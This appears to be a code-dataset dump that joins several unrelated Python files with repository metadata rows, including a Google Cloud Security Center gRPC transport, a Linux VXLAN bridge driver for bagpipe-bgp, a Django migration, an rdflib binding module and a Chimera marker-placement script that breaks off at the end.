# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'update_organization_settings' not in self._stubs:
self._stubs['update_organization_settings'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/UpdateOrganizationSettings',
request_serializer=securitycenter_service.UpdateOrganizationSettingsRequest.serialize,
response_deserializer=gcs_organization_settings.OrganizationSettings.deserialize,
)
return self._stubs['update_organization_settings']
@property
def update_source(self) -> Callable[
[securitycenter_service.UpdateSourceRequest],
Awaitable[gcs_source.Source]]:
r"""Return a callable for the update source method over gRPC.
Updates a source.
Returns:
Callable[[~.UpdateSourceRequest],
Awaitable[~.Source]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'update_source' not in self._stubs:
self._stubs['update_source'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/UpdateSource',
request_serializer=securitycenter_service.UpdateSourceRequest.serialize,
response_deserializer=gcs_source.Source.deserialize,
)
return self._stubs['update_source']
@property
def update_security_marks(self) -> Callable[
[securitycenter_service.UpdateSecurityMarksRequest],
Awaitable[gcs_security_marks.SecurityMarks]]:
r"""Return a callable for the update security marks method over gRPC.
Updates security marks.
Returns:
Callable[[~.UpdateSecurityMarksRequest],
Awaitable[~.SecurityMarks]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'update_security_marks' not in self._stubs:
self._stubs['update_security_marks'] = self.grpc_channel.unary_unary(
'/google.cloud.securitycenter.v1p1beta1.SecurityCenter/UpdateSecurityMarks',
request_serializer=securitycenter_service.UpdateSecurityMarksRequest.serialize,
response_deserializer=gcs_security_marks.SecurityMarks.deserialize,
)
return self._stubs['update_security_marks']
__all__ = (
'SecurityCenterGrpcAsyncIOTransport',
)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
72985b6e699ed82ff22ee8a2afdb80209e328897 | 7a431bf2a221a9b06a7239e6190c66a7de9b9b87 | /bagpipe/bgp/vpn/evpn/linux_vxlan.py | 0dcc7a7dc8a8d42f9c6691ac3ca9f628eadf0c60 | [
"BSD-3-Clause",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | matrohon/bagpipe-bgp | c7bbe84d17d6e3838fef1a00616ba76a31fc96f6 | e0366ea14d3775106e6a4e11bce273647b936071 | refs/heads/master | 2020-12-14T08:50:55.223325 | 2016-03-09T16:59:54 | 2016-03-09T16:59:54 | 33,677,374 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,750 | py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# encoding: utf-8
# Copyright 2014 Orange
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from distutils.version import StrictVersion
from bagpipe.bgp.common import logDecorator
from bagpipe.bgp.common.run_command import runCommand
from bagpipe.bgp.common.looking_glass import LookingGlassLocalLogger
from bagpipe.bgp.vpn.evpn import VPNInstanceDataplane
from bagpipe.bgp.vpn.dataplane_drivers import DataplaneDriver
from bagpipe.exabgp.message.update.attribute.communities import Encapsulation
BRIDGE_NAME_PREFIX = "evpn---"
VXLAN_INTERFACE_PREFIX = "vxlan--"
LINUX_DEV_LEN = 14
class LinuxVXLANEVIDataplane(VPNInstanceDataplane):
def __init__(self, *args, **kwargs):
VPNInstanceDataplane.__init__(self, *args)
if 'linuxbr' in kwargs:
self.bridge_name = kwargs.get('linuxbr')
else:
self.bridge_name = (
BRIDGE_NAME_PREFIX + self.externalInstanceId)[:LINUX_DEV_LEN]
self.vxlan_if_name = (
VXLAN_INTERFACE_PREFIX + self.externalInstanceId)[:LINUX_DEV_LEN]
self.log.info("EVI %d: Initializing bridge %s",
self.instanceId, self.bridge_name)
if not self._interface_exists(self.bridge_name):
self.log.debug("Starting bridge %s", self.bridge_name)
# Create bridge
self._runCommand("brctl addbr %s" % self.bridge_name)
self._runCommand("brctl setfd %s 0" % self.bridge_name)
self._runCommand("brctl stp %s off" % self.bridge_name)
self._runCommand("ip link set %s up" % self.bridge_name)
self.log.debug("Bridge %s created", self.bridge_name)
self._create_and_plug_vxlan_if()
self.log.debug("VXLAN interface %s plugged on bridge %s",
self.vxlan_if_name, self.bridge_name)
self._cleaningUp = False
@logDecorator.logInfo
def cleanup(self):
self.log.info("Cleaning EVI bridge and VXLAN interface %s",
self.bridge_name)
self._cleaningUp = True
self._cleanup_vxlan_if()
# Delete only EVPN Bridge (Created by dataplane driver)
if BRIDGE_NAME_PREFIX in self.bridge_name:
self._runCommand("ip link set %s down" %
self.bridge_name, raiseExceptionOnError=False)
self._runCommand("brctl delbr %s" %
self.bridge_name, raiseExceptionOnError=False)
def _create_and_plug_vxlan_if(self):
self.log.debug("Creating and plugging VXLAN interface %s",
self.vxlan_if_name)
if self._interface_exists(self.vxlan_if_name):
self._remove_vxlan_if()
dstPortSpec = ""
if self.driver.vxlanDestPort:
dstPortSpec = "dstport %d" % self.driver.vxlanDestPort
# Create VXLAN interface
self._runCommand(
"ip link add %s type vxlan id %d local %s nolearning proxy %s" %
(self.vxlan_if_name, self.instanceLabel,
self.driver.getLocalAddress(), dstPortSpec)
)
self._runCommand("ip link set %s up" % self.vxlan_if_name)
# Plug VXLAN interface into bridge
self._runCommand("brctl addif %s %s" % (self.bridge_name,
self.vxlan_if_name))
def _cleanup_vxlan_if(self):
if self._is_vxlan_if_on_bridge():
# Unplug VXLAN interface from Linux bridge
self._unplug_from_bridge(self.vxlan_if_name)
self._remove_vxlan_if()
def _remove_vxlan_if(self):
# Remove VXLAN interface
self._runCommand("ip link set %s down" % self.vxlan_if_name)
self._runCommand("ip link del %s" % self.vxlan_if_name)
def _is_vxlan_if_on_bridge(self):
(output, _) = self._runCommand(
"brctl show %s | grep '%s' | sed -e 's/\s\+//g'" %
(self.bridge_name, VXLAN_INTERFACE_PREFIX))
return True if (output == self.vxlan_if_name) else False
def _interface_exists(self, interface):
"""Check if interface exists."""
(_, exitCode) = self._runCommand("ip link show dev %s" % interface,
raiseExceptionOnError=False,
acceptableReturnCodes=[-1])
return (exitCode == 0)
def _unplug_from_bridge(self, interface):
if self._interface_exists(self.bridge_name):
self._runCommand("brctl delif %s %s" %
(self.bridge_name, interface),
acceptableReturnCodes=[0, 1])
def setGatewayPort(self, linuxif):
gw_ip = self.gatewayIP
gw_mac = "01:00:00:00:00:00" # FIXME
self._runCommand("brctl addif %s %s" %
(self.bridge_name, linuxif),
raiseExceptionOnError=False)
self._runCommand("bridge fdb replace %s dev %s" %
(gw_mac, linuxif))
self._runCommand(
"ip neighbor replace %s lladdr %s dev %s nud permanent" %
(gw_ip, gw_mac, linuxif)
)
def gatewayPortDown(self, linuxif):
self._runCommand("brctl delif %s %s" %
(self.bridge_name, linuxif),
raiseExceptionOnError=False)
# TODO: need to cleanup bridge fdb and ip neigh ?
def setBridgeName(self, linuxbr):
self.bridge_name = linuxbr
@logDecorator.logInfo
def vifPlugged(self, macAddress, ipAddress, localPort, label):
# Plug localPort only into EVPN bridge (Created by dataplane driver)
if BRIDGE_NAME_PREFIX in self.bridge_name:
self.log.debug("Plugging localPort %s into EVPN bridge %s",
localPort['linuxif'], self.bridge_name)
self._runCommand("brctl addif %s %s" %
(self.bridge_name, localPort['linuxif']),
raiseExceptionOnError=False)
@logDecorator.logInfo
def vifUnplugged(self, macAddress, ipAddress, localPort, label,
lastEndpoint=True):
# Unplug localPort only from EVPN bridge (Created by dataplane driver)
if BRIDGE_NAME_PREFIX in self.bridge_name:
self.log.debug("Unplugging localPort %s from EVPN bridge %s",
localPort['linuxif'], self.bridge_name)
self._unplug_from_bridge(localPort['linuxif'])
@logDecorator.log
def setupDataplaneForRemoteEndpoint(self, prefix, remotePE, label, nlri,
encaps):
if self._cleaningUp:
self.log.debug("setupDataplaneForRemoteEndpoint: instance cleaning"
" up, do nothing")
return
mac = prefix
ip = nlri.ip
vni = label
# populate bridge forwarding db
self._runCommand("bridge fdb replace %s dev %s dst %s vni %s" %
(mac, self.vxlan_if_name, remotePE, vni))
# populate ARP cache
if ip is not None:
self._runCommand("ip neighbor replace %s lladdr %s dev %s nud "
"permanent" % (ip, mac, self.vxlan_if_name))
else:
self.log.warning("No IP in E-VPN route, ARP will not work for this"
"IP/MAC")
self._fdbDump()
@logDecorator.log
def removeDataplaneForRemoteEndpoint(self, prefix, remotePE, label, nlri):
if self._cleaningUp:
self.log.debug("setupDataplaneForRemoteEndpoint: instance cleaning"
" up, do nothing")
return
mac = prefix
ip = nlri.ip
vni = label
self._fdbDump()
self._runCommand("ip neighbor del %s lladdr %s dev %s nud permanent" %
(ip, mac, self.vxlan_if_name))
self._runCommand("bridge fdb del %s dev %s dst %s vni %s" %
(mac, self.vxlan_if_name, remotePE, vni))
self._fdbDump()
@logDecorator.log
def addDataplaneForBroadcastEndpoint(self, remotePE, label, nlri, encaps):
if self._cleaningUp:
self.log.debug("setupDataplaneForRemoteEndpoint: instance cleaning"
" up, do nothing")
return
vni = label
# 00:00:00:00:00 usable as default since kernel commit
# 58e4c767046a35f11a55af6ce946054ddf4a8580 (2013-06-25)
self._runCommand("bridge fdb append 00:00:00:00:00:00 dev %s dst %s "
"vni %s" % (self.vxlan_if_name, remotePE, vni))
self._fdbDump()
@logDecorator.log
def removeDataplaneForBroadcastEndpoint(self, remotePE, label, nlri):
if self._cleaningUp:
self.log.debug("setupDataplaneForRemoteEndpoint: instance cleaning"
" up, do nothing")
return
vni = label
self._fdbDump()
self._runCommand("bridge fdb delete 00:00:00:00:00:00 dev %s dst %s "
"vni %s" % (self.vxlan_if_name, remotePE, vni))
self._fdbDump()
def _fdbDump(self):
if self.log.debug:
self.log.debug("bridge fdb dump: %s", self._runCommand(
"bridge fdb show dev %s" % self.vxlan_if_name)[0])
# Looking glass ####
def getLookingGlassLocalInfo(self, pathPrefix):
return {
"linux_bridge": self.bridge_name,
"vxlan_if": self.vxlan_if_name
}
class LinuxVXLANDataplaneDriver(DataplaneDriver):
"""
E-VPN Dataplane driver relying on the Linux kernel linuxbridge
VXLAN implementation.
"""
dataplaneInstanceClass = LinuxVXLANEVIDataplane
requiredKernel = "3.11.0"
encaps = [Encapsulation(Encapsulation.VXLAN)]
def __init__(self, config, init=True):
LookingGlassLocalLogger.__init__(self, __name__)
self.log.info("Initializing %s", self.__class__.__name__)
try:
self.vxlanDestPort = int(config.get("vxlan_dst_port", 0)) or None
except ValueError:
raise Exception("Could not parse specified vxlan_dst_port: %s" %
config["vxlan_dst_port"])
DataplaneDriver.__init__(self, config, init)
def _initReal(self, config):
self.config = config
self.log.info("Really initializing %s", self.__class__.__name__)
o = self._runCommand("uname -r")
kernelRelease = o[0][0].split("-")[0]
if (StrictVersion(kernelRelease) <
StrictVersion(LinuxVXLANDataplaneDriver.requiredKernel)):
self.log.warning("%s requires at least Linux kernel %s (you are"
" running %s)" %
(self.__class__.__name__,
LinuxVXLANDataplaneDriver.requiredKernel,
kernelRelease))
self._runCommand("modprobe vxlan")
def resetState(self):
self.log.debug("Resetting %s dataplane", self.__class__.__name__)
# delete all EVPN bridges
cmd = "brctl show | tail -n +2 | awk '{print $1}'| grep '%s'"
for bridge in self._runCommand(cmd % BRIDGE_NAME_PREFIX,
raiseExceptionOnError=False,
acceptableReturnCodes=[0, 1])[0]:
self._runCommand("ip link set %s down" % bridge)
self._runCommand("brctl delbr %s" % bridge)
# delete all VXLAN interfaces
cmd = "ip link show | awk '{print $2}' | tr -d ':' | grep '%s'"
for interface in self._runCommand(cmd % VXLAN_INTERFACE_PREFIX,
raiseExceptionOnError=False,
acceptableReturnCodes=[0, 1])[0]:
self._runCommand("ip link set %s down" % interface)
self._runCommand("ip link delete %s" % interface)
def _cleanupReal(self):
# FIXME: need to refine what would be different
self.resetState()
def _runCommand(self, command, *args, **kwargs):
return runCommand(self.log, command, *args, **kwargs)
| [
"thomas.morin@orange.com"
] | thomas.morin@orange.com |
b62869b2ea9ec7ee576a4f420b28e4a11c073e56 | 82319ec6aaf462f6823f43946a7f4a0624bffa20 | /Mariana/candies.py | 0cf5f3dbec3776bc67771d2ceb5bca91f91c772a | [
"Apache-2.0"
] | permissive | enterstudio/Mariana | b76a382f5873f9bf83837e9f5190ab6684e14972 | 6b186d93c5fe5521603a389e975595e45e1ea5d2 | refs/heads/master | 2021-04-29T04:30:21.627507 | 2017-11-21T16:30:55 | 2017-11-21T16:30:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,294 | py | import sys, time
import Mariana.settings as MSET
MESSAGE_LOG_FILE = None
def friendly(msgSubject, msg, warning=False, flush = True) :
"""Prints a friendly message"""
global MESSAGE_LOG_FILE
m = " " + msg.replace("\n", '\n ')
if warning :
subject = "WARNING: " + msgSubject
else :
subject = msgSubject
s = """\n%s:\n%s\n%s\n\n Cheers :),\n\n Mariana\n""" %(subject, "-"*(len(subject) + 1), m)
if MSET.VERBOSE :
print s
if flush :
sys.stdout.flush()
if MSET.SAVE_MESSAGE_LOG :
if not MESSAGE_LOG_FILE :
MESSAGE_LOG_FILE = open(MSET.SAVE_MESSAGE_LOG_FILE, "w")
MESSAGE_LOG_FILE.write("\ntimestamp:%s, human time:%s\n%s" % (time.time(), time.ctime(), s))
if flush :
MESSAGE_LOG_FILE.flush()
def fatal(msgSubject, msg, toRaise = ValueError, flush = True) :
"""Death is upon us"""
global MESSAGE_LOG_FILE
m = " " + msg.replace("\n", '\n ')
subject = msgSubject
s = """\n%s:\n%s\n%s\n\n %s\nSorry,\n\n Mariana\n""" %(subject, "-"*(len(subject) + 1), m, toRaise.message)
if MSET.SAVE_MESSAGE_LOG :
if not MESSAGE_LOG_FILE :
MESSAGE_LOG_FILE = open(MSET.SAVE_MESSAGE_LOG_FILE, "w")
MESSAGE_LOG_FILE.write("\ntimestamp:%s, human time:%s\n%s" % (time.time(), time.ctime(), s))
if flush :
MESSAGE_LOG_FILE.flush()
raise toRaise | [
"tariq.daouda@umontreal.ca"
] | tariq.daouda@umontreal.ca |
3d176dce7202f238b832138d2285f99c932b6cae | 3d7860f969ee69585b476fb22ff2ee1cff587eab | /src/inventory/migrations/0003_auto_20180123_1811.py | 56cdec16960d437cfa3a33d52bc9d1ce1df42bb9 | [] | no_license | niketanmoon/inventory1 | c8778c89eb641dd35d75589c3ffb8d8c200eec34 | 7cb204c5ee5519c89bced51e55675f9d0f3475b0 | refs/heads/master | 2022-10-19T01:31:37.915746 | 2018-01-24T09:32:25 | 2018-01-24T09:32:25 | 118,739,027 | 0 | 1 | null | 2022-10-11T05:56:48 | 2018-01-24T08:56:48 | Python | UTF-8 | Python | false | false | 707 | py | # Generated by Django 2.0.1 on 2018-01-23 12:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('inventory', '0002_auto_20180117_1255'),
]
operations = [
migrations.AlterField(
model_name='computer',
name='Acquisitiondate',
field=models.DateField(null=True),
),
migrations.AlterField(
model_name='computer',
name='Purchasedate',
field=models.DateField(null=True),
),
migrations.AlterField(
model_name='computer',
name='Returndate',
field=models.DateField(null=True),
),
]
| [
"niketanmoon@gmail.com"
] | niketanmoon@gmail.com |
4a598d2367df91c2132f36ba1260a08e69c2849f | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_156/405.py | aeb8d5ee9d8ab943436dd2561792b7b36aab3233 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | for j in range(int(raw_input())):
I = int(raw_input())
A = list(map(int, raw_input().split(" ")))
result = max(A)
Z = 2
while Z < result:
result = min(result, sum([(x - 1) // Z for x in A]) + Z)
Z += 1
print 'Case #%d: %s' % (j + 1, result) | [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
2066d3c55c24d18937568e13c5eed223311a3637 | 7876cdf2db81f57998578823f677536e85691075 | /jsongraph/binding.py | e269afb396a71490c93d62c230d23fdd84b24a4d | [
"MIT"
] | permissive | backgroundcheck/jsongraph | fe43b2d1bd3c762639614e513cd727bc93a89a0c | 35e4f397dbe69cd5553cf9cb9ab98859c3620f03 | refs/heads/master | 2021-01-17T11:43:40.447531 | 2015-10-02T13:20:53 | 2015-10-02T13:20:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | from rdflib import Literal, URIRef
# from rdflib.term import Identifier
# from rdflib.namespace import RDF
from jsonmapping import SchemaVisitor
from jsongraph.util import is_url, safe_uriref
from jsongraph.vocab import BNode, PRED, ID
class Binding(SchemaVisitor):
@property
def uri(self):
val = self.path
return None if val is None else URIRef(val)
@property
def subject(self):
if not hasattr(self, '_rdf_subject'):
self._rdf_subject = None
subject = self.schema.get('rdfSubject', 'id')
for prop in self.properties:
if prop.match(subject):
obj = prop.object
if obj is not None and not isinstance(obj, URIRef):
obj = ID[obj]
self._rdf_subject = obj
break
if self._rdf_subject is None:
self._rdf_subject = BNode()
return self._rdf_subject
@property
def predicate(self):
return PRED[self.schema.get('rdfName', self.name)]
@property
def reverse(self):
name = self.schema.get('rdfReverse')
if name is not None:
return PRED[name]
if self.parent is not None and self.parent.is_array:
return self.parent.reverse
def get_property(self, predicate):
for prop in self.properties:
if predicate == PRED[prop.name]:
return prop
@property
def object(self):
if self.data is None:
return self.data
if self.schema.get('format') == 'uri' or \
self.schema.get('rdfType') == 'uri':
try:
return safe_uriref(self.data)
except:
pass
if self.schema.get('rdfType') == 'id':
if is_url(self.data):
try:
return safe_uriref(self.data)
except:
pass
return ID[self.data]
return Literal(self.data)
| [
"friedrich@pudo.org"
] | friedrich@pudo.org |
5bb04a05fca219f33e78261c8eabe59102d646b5 | fb82fdf706863465b1f357cd1fa0447474cd8a70 | /ServerComponent/venv/Lib/site-packages/rsrc/framework/view.py | 33c4500d6b89d88f27d05dc9d26bfb47d98bb8b9 | [
"MIT"
] | permissive | CDU55/FakeNews | d79e2a069b3f1392f779d5b2256cd54c696e789a | 707bd48dd78851081d98ad21bbdadfc2720bd644 | refs/heads/main | 2023-02-20T06:27:18.618837 | 2021-01-17T15:14:27 | 2021-01-17T15:14:27 | 305,167,221 | 0 | 1 | MIT | 2020-12-07T19:51:46 | 2020-10-18T18:16:49 | Python | UTF-8 | Python | false | false | 2,331 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import json
import functools
from rsrc import Request
def response(method):
@functools.wraps(method)
def decorator(self, *args, **kwargs):
resp = method(self, *args, **kwargs)
data = json.dumps(resp.data)
resp.headers.update({'Content-Type': 'application/json'})
return self.make_response(data, resp.status, resp.headers)
return decorator
class ProxyView(object):
"""Delegate requests from framework-view to resource-view.
Subclasses of `ProxyView` should set the `view` attribute, and override
the following methods:
get_uri
get_query_params
get_auth_params
get_data
make_response
"""
def get_uri(self, request):
raise NotImplementedError()
def get_query_params(self, request):
raise NotImplementedError()
def get_auth_params(self, request):
raise NotImplementedError()
def get_data(self, request):
raise NotImplementedError()
def make_response(self, data, status, headers):
raise NotImplementedError()
def make_request(self, raw_request):
request = Request(
scheme=raw_request.scheme,
uri=self.get_uri(raw_request),
method=raw_request.method,
data=self.get_data(raw_request),
query_params=self.get_query_params(raw_request),
kwargs=dict(auth=self.get_auth_params(raw_request))
)
return request
@response
def options(self, request, **kwargs):
return self.view.options_proxy(self.make_request(request), **kwargs)
@response
def get(self, request, **kwargs):
return self.view.get_proxy(self.make_request(request), **kwargs)
@response
def post(self, request, **kwargs):
return self.view.post_proxy(self.make_request(request, **kwargs))
@response
def put(self, request, **kwargs):
return self.view.put_proxy(self.make_request(request), **kwargs)
@response
def patch(self, request, **kwargs):
return self.view.patch_proxy(self.make_request(request), **kwargs)
@response
def delete(self, request, **kwargs):
return self.view.delete_proxy(self.make_request(request), **kwargs)
| [
"48147775+BiancaChirica@users.noreply.github.com"
] | 48147775+BiancaChirica@users.noreply.github.com |
f49f3f5b667f54e765d0a80a7fa5d26295c46453 | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog/optimized_29256.py | 924ec987143f729b08f0842e3acfffa9bd2a048a | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,832 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((518.552, 629.65, 574.573), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((507.239, 570.145, 540.664), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((503.348, 500.265, 498.21), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((626.574, 556.372, 531.081), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((448.028, 337.515, 409.475), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((510.303, 594.831, 545.061), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((510.243, 596.297, 545.021), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((497.807, 602.075, 520.851), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((481.973, 607.464, 498.315), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((481.818, 617.559, 472.34), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((500.365, 632.946, 458.161), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((516.893, 651.345, 471.624), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((502.922, 608.574, 568.927), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((523.23, 696.873, 375.944), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((455.251, 509.78, 340.901), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((455.251, 509.78, 340.901), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((463.341, 517.85, 367.84), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((470.336, 526.879, 394.8), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((480.969, 537.773, 419.792), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((491.986, 549.453, 444), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((497.563, 558.35, 471.103), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((484.289, 562.239, 496.639), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((539.957, 603.04, 248.392), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((422.412, 529.415, 747.31), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((462.708, 525.179, 502.959), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((462.708, 525.179, 502.959), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((486.037, 520.168, 519.143), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((508.272, 504.644, 529.967), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((533.369, 501.183, 515.225), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((567.852, 599.712, 583.659), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((505.878, 403.164, 442.652), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((532.558, 573.259, 553.322), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((532.692, 573.257, 553.382), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((557.884, 585.48, 555.932), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((561.44, 602.363, 533.753), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
